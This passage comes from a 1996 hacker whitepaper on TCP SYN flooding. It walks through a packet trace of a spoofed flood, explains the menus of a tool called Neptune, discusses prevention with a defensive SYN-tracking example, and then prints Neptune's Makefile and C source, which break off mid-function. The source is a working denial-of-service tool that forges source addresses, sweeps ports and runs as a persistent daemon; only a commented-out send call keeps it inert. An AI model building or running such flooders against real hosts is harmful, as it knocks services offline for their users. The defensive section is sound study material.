Frames 4-126 were interactive telnet traffic and added nothing to the
discussion.

127    12.804  ash   onyx  TCP/1510  .A...F, len: 0, seq: 659643408, ack:3580643401,
                                     win:14335, 192.168.2.7 -> 192.168.2.2 IP
128    12.804  onyx  ash   TCP/23    .A...., len: 0, seq:3580643401, ack: 659643409,
                                     win:14322, 192.168.2.2 -> 192.168.2.7 IP
       12.805  onyx  ash   TCP/23    .A...F, len: 0, seq:3580643401, ack: 659643409,
                                     win:14335, 192.168.2.2 -> 192.168.2.7 IP
       12.805  ash   onyx  TCP/1510  .A...., len: 0, seq: 659643409,
                                     win:14334, 192.168.2.7 -> 192.168.2.2 IP

Here we see the 4-way connection termination procedure.

At this point, the flood program is started on onyx, the information
filled in, and the attack is launched.

       42.251  onyx  *BROADCAST  ARP_RARP  ARP: Request, Target IP: 192.168.2.7

Onyx is attempting to get ash's ethernet address using ARP.

       42.251  ash   onyx        ARP_RARP  ARP: Reply, Target IP: 192.168.2.2
                                           0020AF2311D7

Ash responds with its ethernet address.

       42.252  onyx  ash   TCP/23    ....S., len: 0, seq:3364942080,
                                     win: 242, 192.168.2.10 -> 192.168.2.7 IP

The flood begins. Onyx sends the first of 10 TCP segments with the
SYN bit on, and the IP source address spoofed, to the telnet daemon.

       42.252  ash   *BROADCAST  ARP_RARP  ARP: Request, Target IP: 192.168.2.10

Ash immediately attempts to resolve the ethernet address. However,
since there is no such host on the network (and no router to proxy
the request with) the ARP request will not be answered. The host
is, in effect, unreachable.

       42.271  onyx  ash   TCP/23    ....S., len: 0, seq:3381719290,
                                     win: 242, 192.168.2.10 -> 192.168.2.7 IP
       42.291  onyx  ash   TCP/23    ....S., len: 0, seq:3398496510,
                                     win: 242, 192.168.2.10 -> 192.168.2.7 IP
       42.311  onyx  ash   TCP/23    ....S., len: 0, seq:3415273730,
                                     win: 242, 192.168.2.10 -> 192.168.2.7 IP
       42.331  onyx  ash   TCP/23    ....S., len: 0, seq:3432050940,
                                     win: 242, 192.168.2.10 -> 192.168.2.7 IP
       42.351  onyx  ash   TCP/23    ....S., len: 0, seq:3448828160,
                                     win: 242, 192.168.2.10 -> 192.168.2.7 IP
       42.371  onyx  ash   TCP/23    ....S., len: 0, seq:3465605370,
                                     win: 242, 192.168.2.10 -> 192.168.2.7 IP
       42.391  onyx  ash   TCP/23    ....S., len: 0, seq:3482382590,
                                     win: 242, 192.168.2.10 -> 192.168.2.7 IP
       42.411  onyx  ash   TCP/23    ....S., len: 0, seq:3499159810,
                                     win: 242, 192.168.2.10 -> 192.168.2.7 IP
       42.431  onyx  ash   TCP/23    ....S., len: 0, seq:3515937020,
                                     win: 242, 192.168.2.10 -> 192.168.2.7 IP

The next 9 of 10 SYNs. The telnet daemon on ash is now flooded.

At this point, another telnet client is started on Onyx.

       47.227  onyx  *BROADCAST  ARP_RARP  ARP: Request, Target IP: 192.168.2.7

Onyx is again attempting to get ash's ethernet address using ARP.
Hmmm, this entry should be in the arp cache. I should look into
this.

       47.228  ash   onyx        ARP_RARP  ARP: Reply, Target IP: 192.168.2.2
                                           0020AF2311D7

Here is the ARP reply.

146    47.228  onyx  ash   TCP/23    ....S., len: 4, seq:3625358638, ack: 0,
                                     win: 512, 192.168.2.2 -> 192.168.2.7 IP
147    50.230  onyx  ash   TCP/23    ....S., len: 4, seq:3625358638, ack: 0,
                                     win:14335, 192.168.2.2 -> 192.168.2.7 IP
148    56.239  onyx  ash   TCP/23    ....S., len: 4, seq:3625358638, ack: 0,
                                     win:14335, 192.168.2.2 -> 192.168.2.7 IP

Onyx is attempting to establish a connection with the telnet daemon
on Ash, which is, as we saw, flooded.

149    67.251  ash   *BROADCAST  ARP_RARP  ARP: Request, Target IP: 192.168.2.10

Ash is still trying to get the ethernet address of the spoofed host.
In vain...

150    68.247  onyx  ash   TCP/23    ....S., len: 4, seq:3625358638, ack: 0,
                                     win:14335, 192.168.2.2 -> 192.168.2.7 IP
151    92.254  onyx  ash   TCP/23    ....S., len: 4, seq:3625358638, ack: 0,
                                     win:14335, 192.168.2.2 -> 192.168.2.7 IP

Onyx is still transmitting its connection-establishment requests...
Also in vain.

152    92.258  ash   *BROADCAST  ARP_RARP  ARP: Request, Target IP: 192.168.2.10

Hello? Are you out there?


Section VI. Neptune.c


Neptune.c is the companion code. It does everything we've talked
about, and more. Neptune.c is admittedly more complex than it needs to
be. I included several features that are not essential, but make the
program more robust. The program features: a simple to use menuing system, an
alternative command line interface for easy integration into scripts,
ICMP_ECHO requesting to query if the unreachable host is in fact unreachable
(AKA 'ping'ing), infinity mode (read the code) and a daemon mode with (pseudo)
random unreachable IP address choosing.


The menu is really self explanatory...


1   Enter target host

Enter your target. If you are confused at this point, kill yourself.

2   Enter source (unreachable) host

Enter the purported sender. It is integral that this host be routable but not
reachable. Remember that the address must be a unicast address. If it is a
broadcast or multicast address it will be dropped by the target TCP.

3   Send ICMP_ECHO(s) to unreachable

Make sure that your purported sender is in fact unreachable. This is not 100%
reliable as A) ICMP packets can be dropped by the unreliable network layer,
B) the host may filter out ICMP_ECHO packets.

4   Enter port number to flood

The target port to flood. There is an infinity switch.

5   Enter number of SYNs

The number of SYNs to send. Remember, this attack is not bandwidth hungry;
sending more packets than necessary is totally useless.

6   Quit

Bye, bye.

7   Launch

Fire when ready.

8   Daemonize (may or may not be implemented in your version)

Puts the program in daemon mode. It forks to the background and does its
evilness there. Needs two more options: packet sending interval, and time
for daemon to live. Recommended packet sending interval is at least every
90 seconds, depending on the target TCP. 80 should work fine, as the
connection establishment timer is 75 seconds. Daemon lifetime is up to you.
Be kind.


Also the daemon portion includes routines to optionally make use
of a file of unreachable IP addresses and (pseudo) randomly choose from
them. The program reads the file and builds a dynamic array of these IP
addresses in network byte order and then uses rand() (seeded from the time of
day in seconds; we don't need a lot of entropy here, this isn't
cryptography) to generate a number, and then it mods that number by the
number of entries in the table to index a particular IP address.


Since the program opens raw sockets, it needs to run as root. By
default, it is installed SUID root in /usr/local/bin/neptune with the access
list in /etc/sfaccess.conf. The authentication mechanism works by checking
the usernames (via UID) of the attempted flooders. It is not a complex
algorithm, and in fact the code is quite simple (aside: if anyone can find
any security problems with the program being SUID root, above the fact
that the program is admittedly evil, I would love to hear about them). Root
is the only entry the access file starts off with.

For the program to work, you need to remove the comment marks from
the sendto() call in flood() (where the forged datagrams are actually sent). I
did that so the fools simply interested in causing trouble (and not interested
in learning) would find the program mostly useless.


Section VII. Discussion and Prevention 


As we have seen, the attack works because TCP is attempting to do its
job of providing a reliable transport. TCP must establish a connection first,
and this is where the weakness lies. (T/TCP is immune to this attack via TAO.
See my future paper 'The Next Generation Internet' for information on T/TCP
and IPng.) Under normal circumstances, assuming well-behaved networking
software, the worst that can happen is a TCP-based server may be wrapped up in
legitimate connection-establishment processing and a few clients may have to
retransmit their SYNs. But a misbegotten client program can exploit this
connection-establishment weakness and down a TCP-based server with only a few
doctored segments.

The fact that SYN flooding requires such a small amount of network
traffic to be so effective is important to note. Consider other network
DOS attacks such as ICMP_ECHO floods (ping floods), mail bombs, mass mailing
list subscriptions, etc. To be effective, all of these attacks require
an attacker to transmit voluminous amounts of network traffic. Not only does
this make these attacks more noticeable on both ends by decreasing the amount
of available bandwidth (as such, often these attacks are waged from compromised
machines) but it also adds to the general traffic problems of the Internet.
SYN flooding can be deadly effective with as little as 360 packets/hour.


--[ Prevention ]-- 
Ok, so how do we stop it? Good question.


--[ TCPd ]--

TCP wrappers are almost useless. The magic they do is based on the
validity of the source IP address of incoming datagrams. As we know, this can
be spoofed to whatever the attacker desires. Unless the target has denied
traffic from *everywhere* except known hosts, TCP wrappers will not save you.
Even then they arrive too late: tcpd only runs after inetd has accept()ed a
connection, and the spoofed SYNs never get that far; they sit in the backlog
queue in SYN_RCVD where no wrapper ever sees them.


--[ Increase the Backlog ]-- 


Increasing the default backlog is not much of a solution. In
comparison with how little it costs an attacker to simply send more packets,
the memory requirements of the additional connection-establishment structures
are prohibitively expensive. At best it is an obfuscatory measure.


--[ Packet Filtering ]-- 


A smart packet filter (or kernel modification) of some kind may be
a viable solution. Briefly:


- Host keeps a recent log of incoming packets with the 'SYN' bit on in a
  linked list structure.

- The linked list cannot be permitted to grow without bound (another DOS
  attack would present itself).

- When x amount of SYNs are received on a socket, certain characteristics
  about the packets are compared (source port, source IP address, sequence
  numbers, window size, etc.) and if things seem fishy, the connection
  requests and associated memory structures are immediately destroyed.
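The three points above, worked into code. This is an added example for this
article, not Neptune's code and not the author's filter; it runs over
constructed SYN records rather than live packets. The bounded log, the
threshold x and the field comparison follow the sketch above; the constants
THRESHOLD, WINDOW_SEC and MAX_TRACK, the particular "fishy" test (same source
and window size, source port and sequence number each stepping by one, which
is what the flood loop in Section VI produces) and the replay helpers are this
example's own assumptions.

```c
/* synwatch.c: bounded SYN tracker in the spirit of the "Packet Filtering"
   sketch. Added example, not part of Neptune. */
#include <stdio.h>
#include <string.h>

#define MAX_TRACK  16    /* hard bound: the tracker must not be floodable itself */
#define WINDOW_SEC 75    /* look-back, matched to the connection-establishment timer */
#define THRESHOLD  4     /* x: SYNs on one port before their fields are compared */

struct synrec {
    long t;                     /* arrival time, seconds */
    unsigned short dport;       /* port the SYN is for */
    unsigned src;               /* IP source address, host order */
    unsigned short sport;
    unsigned seq;
    unsigned short win;
};

struct tracker {
    struct synrec r[MAX_TRACK]; /* ring buffer: the oldest entry is overwritten */
    int n, next;
};

void tracker_init(struct tracker *tr) { memset(tr, 0, sizeof *tr); }

/* Log one SYN and decide whether the SYNs seen on its port within the window
   look like one tool's burst: at least THRESHOLD of them, all from the same
   source with the same window size, and source port and sequence number each
   exactly one above the previous SYN's. A retransmitted real SYN repeats its
   sport and seq instead of stepping, so it is not flagged. Returns 1 when the
   pending connections on this port should be torn down, 0 otherwise. */
int tracker_syn(struct tracker *tr, struct synrec in) {
    int i, cnt = 0, have_prev = 0, fishy = 1;
    struct synrec prev;

    tr->r[tr->next] = in;
    tr->next = (tr->next + 1) % MAX_TRACK;
    if (tr->n < MAX_TRACK) tr->n++;

    for (i = 0; i < tr->n; i++) {              /* oldest to newest */
        const struct synrec *s = &tr->r[(tr->next - tr->n + i + MAX_TRACK) % MAX_TRACK];
        if (s->dport != in.dport || in.t - s->t > WINDOW_SEC) continue;
        cnt++;
        if (s->src != in.src || s->win != in.win) fishy = 0;
        if (have_prev && (s->sport != (unsigned short)(prev.sport + 1) ||
                          s->seq != prev.seq + 1)) fishy = 0;
        prev = *s;
        have_prev = 1;
    }
    return cnt >= THRESHOLD && fishy;
}

/* Constructed burst shaped like the trace in Section V: one spoofed source
   (192.168.2.10), window 242, sport and seq stepping by one. Returns the
   1-based index of the SYN on which the tracker first fired, 0 if never. */
int replay_flood(int n) {
    struct tracker tr; int i;
    tracker_init(&tr);
    for (i = 0; i < n; i++) {
        struct synrec s = { 42 + i, 23, 0xC0A8020Au, (unsigned short)(1000 + i), 100u + i, 242 };
        if (tracker_syn(&tr, s)) return i + 1;
    }
    return 0;
}

/* Constructed ordinary load: n distinct clients on port 23 with unrelated
   ports and sequence numbers, then a retransmit of the last client's SYN. */
int replay_legit(int n) {
    struct tracker tr; int i; struct synrec s = {0};
    tracker_init(&tr);
    for (i = 0; i < n; i++) {
        struct synrec c = { 42 + i, 23, 0xC0A80300u + i, (unsigned short)(1024 + 37 * i), 1000000u * (i + 1), 8760 };
        s = c;
        if (tracker_syn(&tr, s)) return i + 1;
    }
    s.t += 3;                                   /* retransmit: same sport and seq */
    if (tracker_syn(&tr, s)) return n + 1;
    return 0;
}

/* Records held after m unrelated SYNs: never more than MAX_TRACK. */
int tracker_size_after(int m) {
    struct tracker tr; int i;
    tracker_init(&tr);
    for (i = 0; i < m; i++) {
        struct synrec s = { i, (unsigned short)(1 + i % 7), 0xC0A80400u + i, (unsigned short)(2000 + i), 5u * i, 512 };
        tracker_syn(&tr, s);
    }
    return tr.n;
}

int main(void) {
    printf("neptune-style burst flagged on SYN #%d\n", replay_flood(10));
    printf("ordinary clients flagged on SYN #%d (0 = never)\n", replay_legit(10));
    printf("records held after 100 SYNs: %d (bound %d)\n", tracker_size_after(100), MAX_TRACK);
    return 0;
}
```

The burst is caught on its fourth SYN, ordinary clients and a retransmission
never trip it, and the log stays at MAX_TRACK entries no matter how many SYNs
arrive, which is the property that keeps the filter from becoming the next
denial of service.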


Section VIII. References 


People: A. Cox, R. Stevens
Books:  TCP/IP Illustrated vols. II, III


This project made possible by a grant from the Guild Corporation.


EOF


8< 


Neptune Makefile
daemon9, 1996 Guild Productions


all:
	@gcc -o neptune neptune.c
	@echo ""
	@echo "'make install' will install the program..."
	@echo ""
	@echo "Warning! Neptune is installed SUID root by default!"
	@echo ""
	@echo "route@infonexus.com / Guild Corporation"

install:
	strip ./neptune
	mv ./neptune /usr/local/bin/neptune
	chmod 4755 /usr/local/bin/neptune
	@echo "root" > /etc/sfaccess.conf
	@echo "Installation complete, access list is /etc/sfaccess.conf"

clean:
	@rm -f *.o neptune /etc/sfaccess.conf
8< 
/*
	Neptune
	v1.5

	daemon9/route/infinity
	June 1996 Guild productions
	comments to daemon9@netcom.com
	If you found this code alone, without the companion whitepaper
	please get the real-deal:
	ftp.infonexus.com/pub/SourceAndShell/Guild/Route/Projects/Neptune/neptune.tgz

	Brief synopsis:
	Floods the target host with TCP segments with the SYN bit on,
	purportedly from an unreachable host. The return address in the
	IP header is forged to be that of a known unreachable host. The
	attacked TCP, if flooded sufficiently, will be unable to respond
	to further connects. See the accompanying whitepaper for a full
	treatment of the topic. (Also see my paper on IP-spoofing for
	information on a related subject.)

	Usage:
	Figure it out, kid. Menu is default action. Command line usage is
	available for easy integration into shell scripts. If you can't
	figure out an unreachable host, the program will not work.

	Gripes:
	It would appear that flooding a host on every port (with the
	infinity switch) has its drawbacks. So many packets are trying to
	make their way to the target host, it seems as though many are
	dropped, especially on ethernets. Across the Internet, though, the
	problem appears mostly mitigated. The call to usleep appears to fix
	this... Coming up is a port scanning option that will find open
	ports...

	Version History:
	6/17/96 beta1: SYN flooding, Cmd line and crude menu, ICMP stuff broken
	6/20/96 beta2: Better menu, improved SYN flooding, ICMP fixed... sorta
	6/21/96 beta3: Better menu still, fixed SYN flood clogging problem
	               Fixed some name-lookup problems
	6/22/96 beta4: Some loop optimization, ICMP socket stuff changed, ICMP
	               code fixed
	6/23/96 1.0:   First real version...
	6/25/96 1.1:   Cleaned up some stuff, added authentication hooks, fixed up
	               input routine stuff
	7/01/96 1.5:   Added daemonizing routine...

	This coding project made possible by a grant from the Guild corporation
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <pwd.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <time.h>
#include <linux/signal.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/icmp.h>

#define BUFLEN 256
#define MENUBUF 64
#define MAXPORT 1024
#define MAXPAK 4096
#define MENUSLEEP 700000
#define FLOODSLEEP 100          /* Ethernet, or WAN? Yur mileage will vary.*/
#define ICMPSLEEP 100
#define ACCESSLIST "/etc/sfaccess.conf"

int HANDLERCODE=1;
int KEEPQUIET=0;
char werd[]={"\nThis code made possible by a grant from the Guild Corporation\n\0"};
int main(int argc, char *argv[]) {

    void usage(char *);
    void menu(int, char *);
    void flood(int, unsigned, unsigned, u_short, int);
    unsigned nameResolve(char *);
    int authenticate(int, char *);

    unsigned unreachable=0, target=0;
    int c, port=0, amount=0, sock1, fd;
    struct passwd *passEnt;
    char t[20]={0}, u[20]={0};

    if ((fd=open(ACCESSLIST, O_RDONLY))<=0) {
        perror("Cannot open accesslist");
        exit(1);
    }

    setpwent();
    passEnt=getpwuid(getuid());
    endpwent();
    if (!passEnt) {
        fprintf(stderr, "Cannot find your passwd entry\n");
        exit(1);
    }

    /* Authenticate */
    if (!authenticate(fd, passEnt->pw_name)) {
        fprintf(stderr, "Access Denied, kid\n");
        exit(0);
    }

    /* Open up a RAW socket */
    if ((sock1=socket(AF_INET, SOCK_RAW, IPPROTO_RAW))<0) {
        perror("\nHmmm.... socket problems\n");
        exit(1);
    }

    if (argc==1) {
        menu(sock1, passEnt->pw_name);
        exit(0);
    }

    /* Parse command-line arguments ('8' takes no argument, the rest do) */
    while ((c=getopt(argc, argv, "8s:t:p:a:"))!=-1) {
        switch (c) {
            case 's':                   /* Source (spoofed) host */
                unreachable=nameResolve(optarg);
                strncpy(u, optarg, sizeof(u)-1);
                break;
            case 't':                   /* Target host */
                target=nameResolve(optarg);
                strncpy(t, optarg, sizeof(t)-1);
                break;
            case 'p':                   /* Target port */
                port=atoi(optarg);
                break;
            case '8':                   /* infinity switch */
                port=0;
                break;
            case 'a':                   /* Amount of SYNs to send */
                amount=atoi(optarg);
                break;
            default:                    /* WTF? */
                usage(argv[0]);
        }
    }

    if (!port) {
        printf("\n\nFlooding target: \t\t%u\nOn ports\t\t\t1-%d\nAmount: \t\t\t%u\nPurportedly from: \t\t%u \n", target, MAXPORT, amount, unreachable);
        flood(sock1, unreachable, target, 0, amount);
    }
    else {
        printf("\n\nFlooding target: \t\t%u\nOn port: \t\t\t%u\nAmount: \t\t\t%u\nPurportedly from: \t\t%u \n", target, port, amount, unreachable);
        flood(sock1, unreachable, target, port, amount);
    }
    syslog(LOG_LOCAL6|LOG_INFO, "FLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d\n", getpid(), passEnt->pw_name, t, u, port, amount);
    printf("%s", werd);
    exit(0);
}   /* End main */
/*
 *  Authenticate. Makes sure user is authorized to run program.
 *  The access list holds one user name per line. The match is on the
 *  whole line, not a substring, so that a user named "ro" cannot pass
 *  as "root".
 */
int authenticate(int fd, char *nameID) {
    char buf[BUFLEN+1];
    char *line;
    ssize_t n;

    if ((n=read(fd, buf, BUFLEN))>0) {
        buf[n]=0;                       /* read() does not NUL-terminate */
        for (line=strtok(buf, "\n"); line; line=strtok(NULL, "\n")) {
            if (!strcmp(line, nameID)) {
                close(fd);
                syslog(LOG_LOCAL6|LOG_INFO, "Successful start by %s, PID: %d\n", nameID, getpid());
                return(1);
            }
        }
    }
    close(fd);
    syslog(LOG_LOCAL6|LOG_INFO, "Failed authentication for %s\n", nameID);
    return(0);
}
/*
 *  Flood. This is the main workhorse of the program. IP and TCP header
 *  construction occurs here, as does flooding.
 */
void flood(int sock, unsigned sadd, unsigned dadd, u_short dport, int amount) {

    unsigned short in_cksum(unsigned short *, int);

    struct packet {
        struct iphdr ip;
        struct tcphdr tcp;
    } packet;

    struct pseudo_header {              /* For TCP header checksum */
        unsigned int source_address;
        unsigned int dest_address;
        unsigned char placeholder;
        unsigned char protocol;
        unsigned short tcp_length;
        struct tcphdr tcp;
    } pseudo_header;

    struct sockaddr_in sin;             /* IP address information */
    register int i=0, j=0;              /* Counters */
    int tsunami=0;                      /* flag */
    unsigned short sport=161+getpid();

    if (!dport) {
        tsunami++;                      /* GOD save them... */
        fprintf(stderr, "\nTSUNAMI!\n");
        fprintf(stderr, "\nflooding port:");
    }

    /* Setup the sin struct with addressing information */
    sin.sin_family=AF_INET;             /* Internet address family */
    sin.sin_port=sport;                 /* Source port */
    sin.sin_addr.s_addr=dadd;           /* Dest. address */

    /* Packet assembly begins here */
    /* Fill in all the TCP header information */
    packet.tcp.source=sport;            /* 16-bit Source port number */
    packet.tcp.dest=htons(dport);       /* 16-bit Destination port */
    packet.tcp.seq=49358353+getpid();   /* 32-bit Sequence Number */
    packet.tcp.ack_seq=0;               /* 32-bit Acknowledgement Number */
    packet.tcp.doff=5;                  /* Data offset */
    packet.tcp.res1=0;                  /* reserved */
    packet.tcp.res2=0;                  /* reserved */
    packet.tcp.urg=0;                   /* Urgent offset valid flag */
    packet.tcp.ack=0;                   /* Acknowledgement field valid flag */
    packet.tcp.psh=0;                   /* Push flag */
    packet.tcp.rst=0;                   /* Reset flag */
    packet.tcp.syn=1;                   /* Synchronize sequence numbers flag */
    packet.tcp.fin=0;                   /* Finish sending flag */
    packet.tcp.window=htons(242);       /* 16-bit Window size */
    packet.tcp.check=0;                 /* 16-bit checksum (to be filled in below) */
    packet.tcp.urg_ptr=0;               /* 16-bit urgent offset */

    /* Fill in all the IP header information */
    packet.ip.version=4;                /* 4-bit Version */
    packet.ip.ihl=5;                    /* 4-bit Header Length */
    packet.ip.tos=0;                    /* 8-bit Type of service */
    packet.ip.tot_len=htons(40);        /* 16-bit Total length */
    packet.ip.id=getpid();              /* 16-bit ID field */
    packet.ip.frag_off=0;               /* 13-bit Fragment offset */
    packet.ip.ttl=255;                  /* 8-bit Time To Live */
    packet.ip.protocol=IPPROTO_TCP;     /* 8-bit Protocol */
    packet.ip.check=0;                  /* 16-bit Header checksum (filled in below) */
    packet.ip.saddr=sadd;               /* 32-bit Source Address */
    packet.ip.daddr=dadd;               /* 32-bit Destination Address */

    /* Pseudo-header needed for TCP hdr checksum (these fields
       do not change and do not need to be in the loop) */
    pseudo_header.source_address=packet.ip.saddr;
    pseudo_header.dest_address=packet.ip.daddr;
    pseudo_header.placeholder=0;
    pseudo_header.protocol=IPPROTO_TCP;
    pseudo_header.tcp_length=htons(20);

    while (1) {                         /* Main loop */
        if (tsunami) {
            if (j==MAXPORT) {
                tsunami=0;
                break;
            }
            packet.tcp.dest=htons(++j);
            fprintf(stderr, "%d", j);
            fprintf(stderr, "%c", 0x08);
            if (j>=10) fprintf(stderr, "%c", 0x08);
            if (j>=100) fprintf(stderr, "%c", 0x08);
            if (j>=1000) fprintf(stderr, "%c", 0x08);
            if (j>=10000) fprintf(stderr, "%c", 0x08);
        }
        for (i=0; i<amount; i++) {      /* Flood loop */

            /* Certain header fields should change. Note that seq, source
               and id are incremented without htonl()/htons(), so on a
               little-endian host the step lands in the most significant
               byte of the value that goes on the wire. */
            packet.tcp.source++;        /* Source port inc */
            packet.tcp.seq++;           /* Sequence Number inc */
            packet.tcp.check=0;         /* Checksum will need to change */
            packet.ip.id++;             /* ID number */
            packet.ip.check=0;          /* Checksum will need to change */

            /* IP header checksum */
            packet.ip.check=in_cksum((unsigned short *)&packet.ip, 20);

            /* Setup TCP headers for checksum */
            bcopy((char *)&packet.tcp, (char *)&pseudo_header.tcp, 20);

            /* TCP header checksum */
            packet.tcp.check=in_cksum((unsigned short *)&pseudo_header, 32);

            /* As it turns out, if we blast packets too fast, many
               get dropped, as the receiving kernel can't cope (at
               least on an ethernet). This value could be tweaked
               prolly, but that's up to you for now... */
            usleep(FLOODSLEEP);

            /* This is where we sit back and watch it all come together */
            /*sendto(sock, &packet, 40, 0, (struct sockaddr *)&sin, sizeof(sin));*/
            if (!tsunami && !KEEPQUIET) fprintf(stderr, ".");
        }
        if (!tsunami) break;
    }
}
/*
 *  IP Family checksum routine (from UNP)
 */
unsigned short in_cksum(unsigned short *ptr, int nbytes) {
    register long sum;              /* assumes long == 32 bits */
    u_short oddbyte;
    register u_short answer;        /* assumes u_short == 16 bits */

    /*
     * Our algorithm is simple, using a 32-bit accumulator (sum),
     * we add sequential 16-bit words to it, and at the end, fold back
     * all the carry bits from the top 16 bits into the lower 16 bits.
     */
    sum = 0;
    while (nbytes > 1) {
        sum += *ptr++;
        nbytes -= 2;
    }
    /* mop up an odd byte, if necessary */
    if (nbytes == 1) {
        oddbyte = 0;                                /* make sure top half is zero */
        *((u_char *) &oddbyte) = *(u_char *)ptr;    /* one byte only */
        sum += oddbyte;
    }
    /*
     * Add back carry outs from top 16 bits to low 16 bits.
     */
    sum = (sum >> 16) + (sum & 0xffff);     /* add high-16 to low-16 */
    sum += (sum >> 16);                     /* add carry */
    answer = ~sum;                          /* ones-complement, then truncate to 16 bits */
    return (answer);
}

/*
 *  Converts IP addresses
 */
unsigned nameResolve(char *hostname) {

    struct in_addr addr;
    struct hostent *hostEnt;

    if ((addr.s_addr=inet_addr(hostname))==-1) {
        if (!(hostEnt=gethostbyname(hostname))) {
            fprintf(stderr, "Name lookup failure: '%s'\n", hostname);
            exit(0);
        }
        bcopy(hostEnt->h_addr, (char *)&addr.s_addr, hostEnt->h_length);
    }
    return addr.s_addr;
}

/*
 *  Menu function. Nothing surprising here. Except that one thing.
 */
void menu(int sock1, char *nameID) {

    int slickPing(int, int, char *);
    void flood(int, unsigned, unsigned, u_short, int);
    unsigned nameResolve(char *);
    void demon(int, char *, char *, int, int, int, int);

    int i, sock2, menuLoop=1, icmpAmt, port=0, amount=0, interval, ttl;
    char optflags[7]={0};       /* So we can keep track of the options */
    static char tmp[MENUBUF+1]={0}, target[MENUBUF+1]={0}, unreach[MENUBUF+1]={0};

    while (menuLoop) {
        printf("\n\n\t\t\t[ SYNflood Menu ]\t\t\t[ daemon9 ]\n\n");
        if (!optflags[0]) printf("1\t\tEnter target host\n");
        else printf("[1]\t\tTarget:\t\t\t%s\n", target);
        if (!optflags[1]) printf("2\t\tEnter source (unreachable) host\n");
        else printf("[2]\t\tUnreachable:\t\t%s\n", unreach);
        if (!optflags[2]) printf("3\t\tSend ICMP_ECHO(s) to unreachable\n");
        else printf("[3]\t\tUnreachable host:\tverified unreachable\n");
        if (!optflags[3]) printf("4\t\tEnter port number to flood\n");
        else if (port) printf("[4]\t\tFlooding:\t\t%d\n", port);
        else printf("[4]\t\tFlooding:\t\t1-1024\n");
        if (!optflags[4]) printf("5\t\tEnter number of SYNs\n");
        else printf("[5]\t\tNumber SYNs:\t\t%d\n", amount);
        printf("\n6\t\tQuit\n");
        if (optflags[0]&&optflags[1]&&optflags[3]&&optflags[4]) printf("7\t\tLaunch Attack\n");
        if (optflags[0]&&optflags[1]&&optflags[3]&&optflags[4]) printf("8\t\tDaemonize\n");
        printf("\n\n\n\n\n\n\n\n\n\n\n\n");
        fgets(tmp, MENUBUF, stdin);     /* tempered input: tmp holds MENUBUF+1 bytes */
        switch (atoi(tmp)) {
            case 1:
                printf("[hostname]-> ");
                fgets(target, MENUBUF, stdin);
                i=0;
                if (target[0]=='\n') break;
                while (target[i] && target[i]!='\n') i++;   /* strip the newline */
                target[i]=0;
                optflags[0]=1;
                break;
            case 2:
                printf("[hostname]-> ");
                fgets(unreach, MENUBUF, stdin);
                i=0;
                if (unreach[0]=='\n') break;
                while (unreach[i] && unreach[i]!='\n') i++;
                unreach[i]=0;
                optflags[1]=1;
                break;
            case 3:
                if (!optflags[1]) {
                    fprintf(stderr, "Um, enter a host first\n");
                    usleep(MENUSLEEP);
                    break;
                }
                /* Raw ICMP socket */
                if ((sock2=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP))<0) {
                    perror("\nHmmm.... socket problems\n");
                    exit(1);
                }
                printf("[number of ICMP_ECHO's]-> ");
                fgets(tmp, MENUBUF, stdin);
                if (!(icmpAmt=atoi(tmp))) {
                    close(sock2);
                    break;
                }
                if (slickPing(icmpAmt, sock2, unreach)) {
                    fprintf(stderr, "Host is reachable... Pick a new one\n");
                    sleep(1);
                    optflags[1]=0;
                    optflags[2]=0;
                    HANDLERCODE=1;
                    close(sock2);
                    break;
                }
                optflags[2]=1;
                close(sock2);
                break;
            case 4:
                printf("[port number]-> ");
                fgets(tmp, MENUBUF, stdin);
                port=atoi(tmp);
                optflags[3]=1;
                break;
            case 5:
                printf("[number of SYNs]-> ");
                fgets(tmp, MENUBUF, stdin);
                if (!(amount=atoi(tmp))) break;
                optflags[4]=1;
                break;
            case 6:
                menuLoop--;
                break;
            case 7:
                if (optflags[0]&&optflags[1]&&optflags[3]&&optflags[4]) {
                    syslog(LOG_LOCAL6|LOG_INFO, "FLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d\n", getpid(), nameID, target, unreach, port, amount);
                    flood(sock1, nameResolve(unreach), nameResolve(target), port, amount);
                    menuLoop--;
                }
                else {
                    fprintf(stderr, "Illegal option --try again\n");
                    usleep(MENUSLEEP);
                }
                break;
            case 8:
                if (optflags[0]&&optflags[1]&&optflags[3]&&optflags[4]) {
                    if (!port) {
                        fprintf(stderr, "Cannot set infinity flag in daemon mode. Sorry.\n");
                        usleep(MENUSLEEP*2);
                        break;
                    }
                    printf("[packet sending interval in seconds {80}]-> ");
                    fgets(tmp, MENUBUF, stdin);
                    if (!(interval=atoi(tmp))) interval=80;
                    printf("[time for daemon to live in whole hours (0=forever)]-> ");
                    fgets(tmp, MENUBUF, stdin);
                    ttl=atoi(tmp);
                    syslog(LOG_LOCAL6|LOG_INFO, "DFLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d Interval: %d TTL: %d\n", getpid(), nameID, target, unreach, port, amount, interval, ttl);
                    demon(sock1, unreach, target, port, amount, interval, ttl);
                    exit(0);
                }
                else {
                    fprintf(stderr, "Illegal option --try again\n");
                    usleep(MENUSLEEP);
                }
                break;
            default:
                fprintf(stderr, "Illegal option --try again\n");
                usleep(MENUSLEEP);
        }
    }
    printf("\n");
    printf("%s", werd);
    return;
}


/*
 *  SlickPing.  A quick and dirty ping hack.  Sends <amount> ICMP_ECHO
 *  packets and waits for a reply on any one of them...  It has to check
 *  to make sure the ICMP_ECHOREPLY is actually meant for us, as raw ICMP
 *  sockets get ALL the ICMP traffic on a host, and someone could be
 *  pinging some other host and we could get that ECHOREPLY and foul
 *  things up for us.
 */

int slickPing(amount,sock,dest)
int amount,sock;
char *dest;
{
  void alarmHandler(int);
  unsigned nameResolve(char *);
  register int retcode,j=0;
  struct icmphdr *icmp;
  struct sockaddr_in sin;
  struct sigaction sa;
  unsigned char sendICMPpak[MAXPAK]={0};
  unsigned short pakID=getpid()&0xffff;
  struct ippkt{
    struct iphdr ip;
    struct icmphdr icmp;
    char buffer[MAXPAK];
  }pkt;

  bzero((char *)&sin,sizeof(sin));
  sin.sin_family=AF_INET;
